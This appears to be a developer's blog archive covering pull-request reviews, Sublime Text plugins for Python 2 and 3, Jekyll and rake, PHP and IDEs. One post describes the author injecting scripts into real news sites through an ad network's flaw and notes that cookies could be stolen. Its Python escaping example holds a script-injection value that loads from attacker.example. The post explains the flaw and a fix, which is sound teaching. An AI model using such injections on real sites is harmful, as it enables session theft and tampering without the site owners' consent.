Why didn’t I respond to your pull request?

I have some fairly popular open source packages up on GitHub. Happily, I get people submitting pull requests, adding features or fixing bugs. It’s great when this happens, because people are doing work that I don’t want to do / haven’t gotten to yet / didn’t think of.

…but I’m pretty bad at responding to these. They tend to languish for a while before I get to them. There are a decent number I’ve never even replied to.

Why is this?

Fundamentally, it’s because reviewing a pull request is potentially a lot of work… and the amount of work isn’t necessarily obvious up-front. This means that, for anything which isn’t obviously trivial, I only tend to do reviews when I’m feeling energetic and think I have a decent amount of free time.

First, there are some common problems which might turn up:

  1. It does something I don’t want to include in the project. This is the only outright deal-breaker. Project owner’s prerogative.

  2. It doesn’t work. This happens more often than you’d think, generally because the submitter has written code for the exact use-case they had, and hasn’t considered what will happen if someone tries to use it in a different way.

  3. It works, but not in the way I want it to. For instance, it might behave inconsistently with existing features, and I’d want it adjusted to match.

  4. It should be written differently. This tends to include feedback like “you should use this module” / “this code should really go over here” / “this duplicates code”.

  5. It has coding style violations. Things like indentation, variable names, or trailing whitespace. These aren’t functional problems, but I still don’t want to merge them, because I’d just have to make another commit to fix them myself.

Once I’ve read the patch and worked out this feedback (which might itself take a while, since design feedback and proper testing that exercises all code paths aren’t necessarily quick), I’ll respond asking for changes. Then there’s an unknown wait while the submitter finds time to respond to those requests. Best case for me, they agree with everything I said, make all the requested changes perfectly, and update their pull request with them! Alas, people don’t always think I’m a font of genius, so there’s an unknowable amount of back-and-forth needed to find a compromise we both agree on. This generally involves enough time between responses that the specifics of the patch aren’t in my head any more, so I have to repeat the review process each time.

What can I do better?

One obvious fix: delegate more. Accept more people onto projects and give them commit access, so I don’t have to be the bottleneck. I’m bad at doing this, because my projects tend to start as “scratch my itch” tasks, and I worry about them drifting away from code I’m personally happy with. Plus, I feel that if the problem is “I don’t review patches promptly”, “make someone else do it instead” is perhaps disingenuous as a response. 😀

So, low-hanging fruit…

Coding style violations, despite being trivial, are probably the most common reason a patch sits unmerged while I wait for someone to respond to a request to fix them. This is kind of my fault, because I have a bad habit of not documenting the coding style I expect in my projects, relying on people writing consistent code by osmosis. Demonstrably, this doesn’t work.

As such, I’m starting to add continuous integration services like Travis to my projects. Once that’s set up, it lets me automatically warn contributors about coding style problems that can be linted for, via tools like flake8 or editorconfig, without any further work on my part. If their editing environment is set up for it, they’ll get feedback as they write their patch… and if not, they’ll be told on GitHub when a pull request fails the tests, and won’t have to wait for me to get back to them about it.


The “it doesn’t work” issue can be worked into this framework as well, with a greater commitment to writing tests on my part. If my project is already well-covered, I can have the CI build check test coverage, and thus require that contributors provide tests covering at least most of what they’re submitting, and that they don’t break existing functionality.

This should leave me personally responding to a smaller set of “how should this be written?” issues, which I think will help.

Sublime Text packages: working in 2 and 3

I maintain the Git package for Sublime Text. It’s popular, which is kind of fun and also occasionally stressful. I recently did a major refactor of it, and want to share a few tips.

I needed to refactor it because, back when the Sublime Text 3 beta came out, I had made a branch of the git package to work with ST3, and was thus essentially maintaining two versions of the package, one for each major Sublime version. This was problematic, because every new feature needed to be implemented twice, which wound up hurting my motivation to work on things.

Why did I feel the need to branch the package? Well…

The Problem

Sublime Text is currently suffering from a version problem. There’s the official version, Sublime Text 2, and the easily available beta version, Sublime Text 3. They’re both in widespread use. This division has ground on for around three years now, and is a pain to deal with.

It’s annoying, as a plugin developer, because of a few crucial differences:

Sublime Text 2:

  • Uses Python 2.7.
  • Puts all package contents into a shared namespace.

Sublime Text 3:

  • Uses Python 3.3.
  • Puts all package contents into a module named for the package.
  • Has some new APIs, removes some old APIs.

…yes, the Sublime Text 2 / 3 situation is an annoyingly close parallel to the general Python 2 / 3 situation that is itself a subset of the Sublime problem. I prefer less irony in my life.

Python

What changed in Python 3 is a pretty well-covered topic, which I’m not going to go into here.

Suffice it to say that the changes are good, but they introduce some incompatibilities, so code has to be written carefully if it needs to run on both versions.

Imports

If your plugin is of any size at all, you probably have multiple files because separation of code into manageable modules is good. Unfortunately, the differing way that packages are treated in ST2 vs ST3 makes referring to these files difficult.

In Sublime Text 2, all files in packages are in a great big “sublime” namespace. Any package can import modules from any other package, perhaps accidentally.

For instance, in ST2, a plain “import comment” gets us the Default.comment module, which provides the built-in “toggle comment on a line” functionality. Unless some other package has a comment.py, in which case what we get becomes order-of-execution dependent.

Note the fun side-effect of this: if any package has a file which shares a name with anything in the standard library, it’ll “shadow” that module, and any other package which then tries to use that part of the standard library will break.

Because of these drawbacks, Sublime Text 3 made the very sensible decision to make every package its own module. That is, to get that comment module, we need to qualify it with the package name, as in “import Default.comment” or “from Default import comment”.

This is better, and makes it harder to accidentally break other packages via your own naming conventions. However, it does cause compatibility problems in two situations:

  1. You want to access another package
  2. You want to use relative imports to access files in your own package

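The latter case is the tricky one, because relative imports behave differently depending on whether you’re inside a package or not. In ST3 your files live inside the package’s module, and Python 3 has no implicit relative imports, so you need explicit ones like “from . import foo”. In ST2 your files are top-level modules, where that same explicit relative import fails.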

Editing text

In Sublime Text 2 you had to call edit = view.begin_edit(...) and view.end_edit(edit) to group changes you were making to text, so that undo/redo would bundle them together properly.

In Sublime Text 3 these were removed, and any change to text has to happen inside a sublime_plugin.TextCommand, which handles the edit-grouping itself without involving you.

The Solution (sort of)

If you want to write a plugin that works on both versions, you have to write Python that runs on both 2 and 3, and you have to tread very carefully around relative imports.

Python 2 / 3

A good first step here is to stick a set of __future__ imports at the top of all your Python files.

This gets Python 2 and 3 mostly on the same page; you can largely just write for Python 3 and expect it to work in Python 2. There are still some differences to be aware of, mostly where the standard library was reorganized, or where the difference between bytes and str actually matters. But these can be worked around.
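For reference, a common set of __future__ imports for this purpose looks something like the following. Treat the exact list as an assumption rather than a prescription, and note that __future__ imports have to come before any other statement in the file.

```python
# __future__ imports must be the first statements in a module (only a
# docstring and comments may precede them). This set is a common choice,
# not necessarily what every package needs.
from __future__ import absolute_import, division, print_function, unicode_literals

# With the imports above, Python 2.7 matches Python 3 on these points:
half = 7 / 2            # true division: 3.5 on both versions
floor_half = 7 // 2     # explicit floor division: 3 on both
label = "commit"        # a text literal: str on Python 3, unicode on Python 2
print("7 / 2 =", half)  # print is a function on both
```

absolute_import matters for the import discussion too: with it, Python 2 stops treating a bare “import foo” as a possible sibling-module import.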

For standard library reshuffling, trying the new location and falling back to the old one on ImportError works.
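A minimal sketch of that pattern, using quote purely as an example of something that moved from urllib in Python 2 to urllib.parse in Python 3:

```python
try:
    # Python 3 location (Sublime Text 3)
    from urllib.parse import quote
except ImportError:
    # Python 2 location (Sublime Text 2)
    from urllib import quote

# Either way, the rest of the code just uses `quote`.
encoded = quote("feature branch/fix")
```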

If your package relies on something which changed more deeply, more extensive branching might be required.

Imports

If you want to access another package’s module, as with the comment example above, this is a sensible enough place to just try one import and catch the ImportError.

You could check for the version of Sublime, of course, but the duck-typing approach here seems more Pythonic to me.
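A plain try/except around the two imports does the job. If you need it in several places, a small helper along these lines (hypothetical, not part of Sublime’s API) keeps things tidy; it returns the first module name that imports successfully.

```python
import importlib


def import_first(*names):
    """Return the first module in `names` that imports successfully.

    Hypothetical helper: list the ST3 package-qualified name first and the
    ST2 shared-namespace name second.
    """
    for name in names:
        try:
            return importlib.import_module(name)
        except ImportError:
            continue  # not available under this Sublime version; try the next name
    raise ImportError("none of these modules could be imported: " + ", ".join(names))


# Inside Sublime this would be called as something like:
#   comment = import_first("Default.comment", "comment")
```

One caveat with this sketch: an ImportError raised from inside a module that does exist is swallowed too, so a genuinely broken module shows up as the fallback being used.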

When accessing your own files, what made sense to me was to make it consistent by moving your files into a submodule, which means that the “importing a file in the same module” case is all you ever have to think about.

Thus: move everything into a subdirectory, and make sure there’s an __init__.py within it.

There’s one drawback here, which is that Sublime only notices commands that are in top-level package files. You can work around this with a my_package_commands.py file, or similar, which just imports your commands from the submodule.

There’s one last quirk to this, which only applies to you during package development: Sublime Text only reloads your plugin when you change a top-level file. Editing a file inside the submodule does nothing, and you have to restart Sublime to pick up the changes.

I noticed that Package Control has some code to get around this, so I copied its approach in my top-level command-importing file, making it so that saving that file will trigger a reload of all the submodule contents. It has one minor irritation, in that you have to manually list files in the right order to satisfy their dependencies. Although one could totally work around this, I agree with the Package Control author that it’s a lot simpler to just list the order and not lose oneself in metaprogramming.
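A minimal sketch of the idea (not Package Control’s actual code; the module names are hypothetical): the top-level file keeps an ordered list of submodules and reloads whichever of them are already loaded, so saving that file refreshes them all.

```python
import sys

try:
    reload  # Python 2 (Sublime Text 2): reload is a built-in
except NameError:
    try:
        from importlib import reload  # Python 3.4+
    except ImportError:
        from imp import reload  # Python 3.3 (Sublime Text 3)

# Hypothetical submodules, listed so each one comes after the modules it imports.
RELOAD_ORDER = [
    "my_package.util",
    "my_package.status",
    "my_package.commands",
]


def reload_submodules(order):
    """Reload each already-imported module in `order`; return the names reloaded."""
    reloaded = []
    for name in order:
        module = sys.modules.get(name)
        if module is not None:  # not imported yet: a normal import loads it fresh
            reload(module)
            reloaded.append(name)
    return reloaded


# In the top-level commands file, call this at module level before importing
# the commands, so that saving that file refreshes the submodules:
#   reload_submodules(RELOAD_ORDER)
```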

Editing text

Fortunately, sublime_plugin.TextCommand exists in Sublime Text 2 with the same API signature as in Sublime Text 3, so all you have to do here is wrap all your text edits in a TextCommand that you run (via view.run_command) when needed.

Conclusion

Getting a package working in Sublime Text 2 and 3 simultaneously is entirely doable, though there are some nuisances involved, which is appropriate given that “run in Python 2 and 3 simultaneously” is a subset of the problem. That said, if you do what I suggest here, it should largely work without you having to worry about it.

Raking Jekyll

I’ve never really touched rake before, but since switching to Jekyll I’m finding that it’s becoming an essential part of my workflow. In the limited area of blogging, at least.

rake is a version of make in which you define all your targets in Ruby. Because practically anything would be an improvement over Makefile syntax, this is pretty easy to work with. I’m not a huge fan of shell scripting at the best of times, so mixing it in with something else is… not desirable. I still find Ruby less intuitive than Python, but that’s my prejudices talking.

To elaborate… what does posting a new entry look like for me?

  1. rake server to start up an automatically-rebuilding local webserver copy of my blog
  2. rake post[raking-jekyll] to make a new post with the YAML front matter boilerplate
  3. Actually edit the newly created post in an editor
  4. rake deploy to rsync the local copy to my hosting over ssh

Any part of my routine which looks like it might be scriptable has been replaced with a rake target. For example, the post target:

  1. Copies a template file
  2. Names it according to the current date and provided title
  3. Adds the full current date and time to its YAML front matter, so sorting will work correctly if I post multiple times a day

Since I rarely know the current date without having to look it up, that certainly saves me some effort.
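The post target itself lives in a Ruby Rakefile. As a rough, hypothetical Python sketch of the same naming and date-stamping steps (the build_post name, the .md extension and the template’s shape are all assumptions):

```python
from datetime import datetime


def build_post(slug, template, now=None):
    """Return (filename, text) for a new Jekyll post.

    Assumes `template` starts with a YAML front matter block opened by a
    '---' line; the '.md' extension is also an assumption.
    """
    now = now or datetime.now()
    # Jekyll expects post files named YEAR-MONTH-DAY-title.EXT
    filename = "{0:%Y-%m-%d}-{1}.md".format(now, slug)
    # A full timestamp in the front matter keeps same-day posts in order.
    date_line = "date: {0:%Y-%m-%d %H:%M:%S}\n".format(now)
    text = template.replace("---\n", "---\n" + date_line, 1)
    return filename, text


name, text = build_post(
    "raking-jekyll",
    "---\nlayout: post\ntitle: Raking Jekyll\n---\n",
    now=datetime(2012, 8, 20, 14, 3),
)
```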

Here’s my Rakefile, if you want to use anything from it. It’s probably not properly idiomatic Ruby, but it does at least work.

XSS is fun!

Pretending innocence, I ask: why do all these high-profile websites have their homepages covered in spinning images?

Okay, obviously enough, I’m messing with them. But how can I do that?

The answer is cross site scripting (“XSS”).

XSS is surprisingly common, and is nigh-universally caused by poorly escaped user inputs, even inputs which, as in this case, the site obviously doesn’t think of as user inputs. It happens when content injected into a page results in arbitrary JavaScript being loaded onto that page.
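To make “poorly escaped” concrete, here is a small Python sketch using the standard library’s html.escape; the injected value and the input tag are hypothetical.

```python
import html

# Hypothetical value an attacker passes in a query parameter that the page
# then echoes back inside an HTML attribute.
user_input = '"><script src="https://attacker.example/x.js"></script>'

# Unsafe: the value is pasted in verbatim, so it closes the attribute and
# injects a live <script> tag that loads attacker-controlled JavaScript.
unsafe = '<input value="' + user_input + '">'

# Safer: html.escape turns &, < and > (and, with quote=True, both quote
# characters) into entities, so the value stays inert text.
safe = '<input value="' + html.escape(user_input, quote=True) + '">'

print(unsafe)
print(safe)
```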

As such, I own your interaction with those sites. If I was malicious I could be harvesting your cookies from them, redirecting you to phishing sites, recording everything you type, or just snooping on everything you view. As an example of why someone might want to do this… in the case of these particular sites, stealing your cookies (document.cookie) would let me post comments as you. I could thus spam those sites using legitimate accounts that I don’t have to go through the hassle of creating myself.

I’m not doing this, because that wouldn’t be nice. All I’m doing is reversing links and spinning images, because I think that’s cute.

In this case, all these sites have screwed up by including a little bit of HTML from an ad network (EyeWonder) on their sites. This HTML accepts an arbitrary URL as a parameter, and loads it in a <script> tag. This is quite a common way for ad networks to ruin your day, often in the name of “frame busting”.

If you’re wondering who might be vulnerable to this exact hole from this exact ad network, Google can help you with that. Hint: it’s a lot of sites. I just grabbed the first three big names to demonstrate with.

Here’s the offending HTML:

This would actually be pretty easy to fix. A little bit of checking of the input, restricting it to scripts hosted on known-trusted domains, would be enough to make exploiting it almost impossible. (I say “almost” because someone sufficiently resourceful might find that one of these “trusted” domains isn’t as secure as they hoped, and slip a script onto it. But it at least raises the bar.)
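A sketch of that kind of allowlist check in Python; the hostnames are hypothetical, and a real fix would live wherever the ad network’s code reads its parameter.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the exact hostnames allowed to serve scripts.
TRUSTED_SCRIPT_HOSTS = {"ads.example-network.com", "cdn.example-network.com"}


def is_trusted_script_url(url):
    """Accept only https URLs whose host exactly matches the allowlist."""
    parts = urlsplit(url)
    # .hostname is lowercased and excludes any "user@" prefix and port, so
    # "https://cdn.example-network.com@evil.example/x.js" resolves to evil.example.
    return parts.scheme == "https" and parts.hostname in TRUSTED_SCRIPT_HOSTS
```

Matching hostnames exactly, rather than checking that the URL merely contains or ends with a trusted name, avoids lookalikes such as cdn.example-network.com.evil.example.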

If you’re curious what I’m doing to make these pages spin, check out this gist which includes the spinner script. Essentially it just makes an iframe which shows the root of the domain, and then manipulates the contents of that iframe, which it’s allowed to do because the script is running on the same domain.

In short: never trust user input. Also, don’t trust your ad networks to know/care about security.

This post brought to you by my coworker Paul Banks pointing out the existence of this fun little hole on CNN. I then added the spinning myself, because it looks nice and spectacular.

Jekyll

I’ve just redone my website using Jekyll. It is now completely static. No PHP, no database, nothing like that.

Why did I do this?

  • It’s quite soothing knowing that all my content is version controlled.
  • I am now nigh-immune to traffic spikes. I was using caching with WordPress before, so it had never been an issue even when I was on the HN frontpage, but there’s some peace of mind in it.
  • WordPress had a history of security bugs which wasn’t comforting. Since nothing on this new site is executable I feel pretty secure now.
  • My site is now ridiculously flexible. Jekyll forces almost no structure on you, leaving you free to change things around as you please.

I’m happy with the end result, but the process of getting there was not without pain.

The initial difficulty came from Jekyll’s documentation being somewhat lacking. I found myself confused about minor details like “how does a layout work?”. After I’d pieced that together by examining other sites built with Jekyll, I discovered that the template data docs were inaccurate / misleading, implying the presence of a post variable which didn’t exist. It turned out to be something that’s merged into page if you’re viewing a post.

I don’t completely blame Jekyll for this being opaque. Jekyll uses Liquid for its templating language, which claims to be aimed at designers… and I feel it would benefit from some sort of debugging mode that dumps the current scope for examination.

I resorted to reading Jekyll’s source, which cleared up a number of things. However, I view it as a bad sign that I felt I had to do this. Not that a command-line driven static website generator is ever likely to be a mainstream product, but still, it’s the principle of the thing.

Pagination worked, but was completely lacking in configuration. Since part of my goal was to have my URLs remain the same as they were in WordPress, I had to change this. I did so with a horrible monkey-patching hack of a plugin. Specifically, I made a copy of the pagination module from Jekyll’s core into my _plugins directory and selectively edited it to change the pagination urls.

In the process I noticed a bug in the core code, and submitted a pull request to fix it. So horrible monkey patching might at least pay off this time.

Also utterly broken was the related posts feature. No matter what, it always seemed to think the most recent posts were the most related to anything. It’s possible that running with --lsi would have helped with this, via complex semantic analysis, but that takes forever and I’ve seen others complain that it doesn’t really help. So there’s more monkey patching going on via Lawrence Woodman’s related posts plugin, which I took and edited so it worked based on tags instead of categories.
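Lawrence Woodman’s plugin is Ruby and isn’t reproduced here. As a rough sketch of the tag-based idea, assuming each post is a dict with title, tags and date, related posts can be ranked by how many tags they share, with recency as the tie-breaker:

```python
def related_posts(post, all_posts, limit=5):
    """Rank other posts by how many tags they share with `post`.

    Hypothetical data shape: each post is a dict with "title", "tags"
    (a list of strings) and "date" (anything sortable, e.g. a datetime).
    """
    tags = set(post["tags"])
    scored = []
    for other in all_posts:
        if other is post:
            continue
        shared = len(tags & set(other["tags"]))
        if shared:  # posts with no tags in common are never "related"
            scored.append((shared, other["date"], other))
    # Most shared tags first; ties go to the more recent post.
    scored.sort(key=lambda item: (item[0], item[1]), reverse=True)
    return [other for _, _, other in scored[:limit]]
```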

One thing I haven’t fixed, which I’d like to, is making the automatic regeneration of your site during development / writing a lot smarter. Right now it notices a file has changed and so it regenerates every single bit of content on your site. This does mean that the live generated site always has recent/related posts up to date everywhere… but it’d be nice to have some sort of --quick option that ignored that stuff in favor of a faster development cycle.

Because of the utter staticness, I naturally cannot have my own comment system in use any more. So I’ve switched to Disqus, which adds commenting to the site via JavaScript. It feels sort of weird to be outsourcing a component of my user experience like this… but they seem trustworthy: they’re widely used, and their monetization plan is fairly transparent.

If you’re interested you can see the repo for my website on GitHub. It contains, in its default / post templates, markup that’s compatible with any WordPress theme that’s based on Toolbox, which might be of use to some.

Like I said, I’m happy with how it turned out. I wouldn’t recommend this at all for a non-technical person, but if you want to dig in and get your hands dirty then Jekyll is quite workable.

To replace PHP you need

(Expanding slightly on my response to this HN thread.)

First: to be on all shared hosting everywhere. I.e. you need to be really easy to install, and preferably not involve long-running processes that shared hosts might choke on.

Second: to be beginner friendly. No requirement of understanding MVC, or running commands in a shell (hi RoR!). Pure instant gratification. Someone’s first step into using PHP is likely going to be “I want the current date in the footer of my page”, or “I want a random image on my homepage”, or something like that. Being able to handle anything like that by taking your existing page and dropping a tiny snippet in where you want the change to happen is a potent thing to someone who has never programmed before.

Note: For point 2, many of the things serious programmers hate about PHP are actually advantages. All the functions in one big namespace? That’s great! A newbie doesn’t have to try to understand imports.

It’s easy to replace PHP for serious developers. We like advanced features, and care about a sane default library. We’re willing to use complex tools to get a payoff.

It’s hard to replace PHP for non-programmers who just want to tweak their static page in notepad so it has one cool new feature, or install a blogging package on their cheapo shared hosting.

To sum up: if you don’t address both of these points then you haven’t killed PHP. You’re competing with Python or Ruby or whatever. PHP will carry right on ignoring you, because you’re not addressing its fundamental use case.

Why not just use an IDE if you want IDE features?

After I posted about my Sublime Text 2 git plugin I got one response which I thought was worth responding to.

That looks helpful, but I often wonder why not just use an IDE if you want IDE features.

Obviously I have a bias here, but I’ll try to be fair to IDEs…

An IDE is an editor that does a lot of things, many of them well. If there’s something you want to do it’ll almost certainly let you do it, but if you’re not happy with some basic element of how it works then you’re stuck having to find a new IDE. (Yes, I know, many IDEs have plugins available, but I’ve never had that much luck with them.)

IDEs also tend to be built with a workflow in mind. If you conform to that workflow then they’ll be good to you, but if you want to deviate from it you may have to fight with your tools.

A lightweight-but-extensible editor (e.g. Sublime, TextMate, vi, and so on) tends to focus on having a really good editing experience. So you start with good editing, and then you pick and choose the “IDE features” that you want to mix in. If part of the editor doesn’t work how you want you might have to find a new plugin for it, but since it’s not a massive and complicated system it’s likely to be easier to find that plugin.

Neither is necessarily better, but they do tend to appeal to different types of developer. Web developers, needing to work with a number of different file types, and not generally having complicated build system requirements, gravitate towards the lightweight editors.

UPDATE: To be clear, I’m not saying either is better. It’s a matter of personal choice and situation. As someone who mostly does web development in dynamic languages, I like using a fairly lightweight editing environment. If I wrote in Java I’m sure I’d be singing the praises of IntelliJ/Eclipse/whatever, because I understand that Java is almost impossible to write well without an IDE.

Sublime Text 2 git plugin

I wrote a git plugin for Sublime Text 2.

I’d decided to try Sublime out for work to see how it compared to TextMate… and thus some degree of git integration was required. Given that it’s been out since January, I was surprised that there wasn’t already a solid git plugin.

I did find this one, admittedly, but I decided that I didn’t like how it fit in with Sublime. It’s built around menus and keybinds, whereas I felt that setting everything up as commands in the palette and hooking as much stuff as I could into the fuzzy search was the way to go.

Working on the plugin was a good exercise in getting me used to Sublime. I’m fairly sold on it as a result. It’s philosophically somewhat similar to TextMate, but with some of TextMate’s rough edges smoothed out.

(Short rant: if the recently announced TextMate2 alpha doesn’t get rid of the single-character undo buffer… I don’t know what I’ll do. It’s certainly the biggest single complaint I have about TextMate nowadays.)